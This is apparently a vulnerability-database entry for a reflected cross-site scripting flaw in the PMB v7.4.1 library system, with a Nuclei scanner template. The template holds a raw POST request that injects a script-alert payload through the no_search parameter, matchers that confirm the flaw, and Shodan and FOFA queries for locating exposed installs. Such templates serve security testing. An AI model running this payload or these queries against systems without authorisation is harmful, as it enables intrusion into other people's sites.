pmb-xss: PMB v7.4.1 - Cross Site Scripting

日期: 2025-08-01 | 影响软件: PMB v7.4.1 | POC: 已公开

漏洞描述

PMB v7.4.1 allow attacker to inject arbitrary malicious HTML or Javascripts code in user web browser via no_search parameter

PoC代码[已公开]

id: pmb-xss

info:
  name: PMB v7.4.1 - Cross Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    PMB v7.4.1 allow attacker to inject arbitrary malicious HTML or Javascripts code in user web browser via no_search parameter
  reference:
    - https://github.com/jenaye/PMB
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cwe-id: CWE-80
  metadata:
    verified: true
    max-request: 1
    shodan-query:
      - http.favicon.hash:1469328760
      - http.html:"pmb group"
    product: pmb
    vendor: sigb
    fofa-query:
      - icon_hash=1469328760
      - body="pmb group"
  tags: xss,pmb,cms,vuln

http:
  - raw:
      - |
        POST /pmb/opac_css/index.php?lvl=search_result&search_type_asked=extended_search HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        add_field=&search%5B%5D=f_1&op_0_f_1=EXACT&field_0_f_1%5B%5D=gang&explicit_search=1&search_xml_file=search_fields&delete_field=&launch_search=1&page=&no_search=0&ij6fm%22%3e%3cscript%3ealert(1337)%3c%2fscript%3evg9q6c4g1mk=1

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert(1337)</script>'

      - type: word
        part: body
        words:
          - 'PMB Group'
          - 'pmbDojo'
        condition: or

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100db372c6ad18e813581501bc4b66fea1eb41f0fd8431b0be08ebb6c7ce953839f022100d9cebbb183508c93350a596e9a1ae3b8e31109889dbc22ba7b4d789932684b8a:922c64590222798bb761d5b6d8e72950